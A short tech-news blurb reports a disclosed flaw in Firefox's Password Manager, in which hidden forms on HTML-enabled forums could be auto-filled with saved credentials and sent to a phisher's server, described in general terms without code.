Firefox Gives Away Passwords for Free
Chapin Information Services (CIS) have discovered quite a major flaw in the way Firefox's Password Manager automatically populates username and password fields on a web form.Whilst this is a major time saver, it does however allow phishers to gather usernames and passwords without you actually knowing it, especially on weblogs and forums which allow posters to input HTML. Essentially, they would just create a hidden form that Firefox would automatically populate with your username and password for that site and then submit it to the phisher's server when you click a link or hit enter. This doesn't use cross site scripting (XSS) methods either as it's essentially gathering passwords for the site you're actually visiting (hence most phishing detectors won't pick this up). Continue reading ►